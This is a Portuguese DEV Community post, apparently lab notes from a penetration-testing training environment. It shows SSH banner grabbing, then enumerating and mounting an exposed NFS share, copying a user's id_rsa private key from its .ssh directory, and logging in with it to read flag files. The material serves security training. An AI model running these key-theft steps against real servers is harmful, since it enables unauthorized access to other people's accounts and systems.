DEV Community

Thalita
Thalita

Posted on

SSH - Enumeration

  1. Monte o diretório na sua máquina usando o NFS.
  2. Navegue entre os diretórios após a montagem.
  3. Acesse o diretório SSH.
  4. Obtenha a chave privada.
  5. Faça o download da chave privada para a sua máquina.
  6. Utilize a chave privada com o parâmetro -i ao se conectar no servidor via SSH.
  7. Após a conexão, navegue na raiz do servidor e realize as ações desejadas.

Neste mesmo host analisado anteriormente existe um serviço de SSH.

Host: 172.16.1.33

Quais os métodos de autenticação aceitos no serviço de SSH?

Realizamos um banner grabbing para detectar o sistema operacional e a possível versão do servidor em execução:

nc 172.16.1.33 22 ou 2222
Enter fullscreen mode Exit fullscreen mode

Após isso, identificamos o método de autenticação que está sendo utilizado e os métodos aceitos pelo servidor. Utilizamos o próprio utilitário SSH em modo verbose:

ssh -v 172.16.1.33
Enter fullscreen mode Exit fullscreen mode

Confirme com yes para prosseguir. Encontre a opção "Authentications that can continue".

= Resposta do laboratório.

RESPOSTA DO VLAB

rpcinfo -p 172.16.1.5 | grep nfs
Enter fullscreen mode Exit fullscreen mode 
showmount -e 172.16.1.31
Enter fullscreen mode Exit fullscreen mode 
mkdir /tmp/nfs
Enter fullscreen mode Exit fullscreen mode

Em seguida, mova o diretório encontrado /home/camila para o /tmp/nfs com o comando:

mount -t nfs -o nfsvers=2 172.16.1.31:/home/camila /tmp/nfs
Enter fullscreen mode Exit fullscreen mode

Depois, navegue no diretório montado com:

ls -la /tmp/nfs
Enter fullscreen mode Exit fullscreen mode

Em seguida, acesse o diretório /tmp/nfs/.ssh

Roube a chave privada e faça o download para a máquina com o comando:

cp id_rsa /home/rewind
Enter fullscreen mode Exit fullscreen mode

Ao conectar-se ao servidor via SSH, use a chave da seguinte forma:

ssh -i id_rsa camila@172.16.1.31 -o HostKeyAlgorithms=+ssh-dss -o PubkeyAcceptedKeyTypes=+ssh-dss
Enter fullscreen mode Exit fullscreen mode

Agora você pode navegar dentro do servidor: ir até a raiz, "/ /", etc.

ROUBANDO A CHAVE Privada:

rpcinfo -p 172.16.1.5 | grep nfs
Enter fullscreen mode Exit fullscreen mode 
showmount -e 172.16.1.31
Enter fullscreen mode Exit fullscreen mode 
mkdir /tmp/nfs
Enter fullscreen mode Exit fullscreen mode 
cd /tmp/nfs
Enter fullscreen mode Exit fullscreen mode 
ls -la /tmp/nfs
Enter fullscreen mode Exit fullscreen mode 
cd /tmp/nfs/.ssh
Enter fullscreen mode Exit fullscreen mode 
ls -la
Enter fullscreen mode Exit fullscreen mode 
cat id_rsa.pub
Enter fullscreen mode Exit fullscreen mode 
cat id_rsa
Enter fullscreen mode Exit fullscreen mode 
cp id_rsa /home/rewind
Enter fullscreen mode Exit fullscreen mode

Ao conectar-se ao servidor via SSH, utilize a chave da seguinte forma:

ssh -i id_rsa camila@172.16.1.31 -o HostKeyAlgorithms=+ssh-dss -o PubkeyAcceptedKeyTypes=+ssh-dss
Enter fullscreen mode Exit fullscreen mode 
id_rsa
Enter fullscreen mode Exit fullscreen mode 
ls
Enter fullscreen mode Exit fullscreen mode 
cat key.txt
Enter fullscreen mode Exit fullscreen mode 
cd /root
Enter fullscreen mode Exit fullscreen mode 
cd /home
Enter fullscreen mode Exit fullscreen mode 
cd /home/anonymous
Enter fullscreen mode Exit fullscreen mode 
ls
Enter fullscreen mode Exit fullscreen mode 
cd anonymous
Enter fullscreen mode Exit fullscreen mode 
ls
Enter fullscreen mode Exit fullscreen mode 
cat key.txt
Enter fullscreen mode Exit fullscreen mode 
cd /home
Enter fullscreen mode Exit fullscreen mode 
cd /home/camila
Enter fullscreen mode Exit fullscreen mode 
cd //
Enter fullscreen mode Exit fullscreen mode 
ls
Enter fullscreen mode Exit fullscreen mode 
cat key.txt
Enter fullscreen mode Exit fullscreen mode

Top comments (0)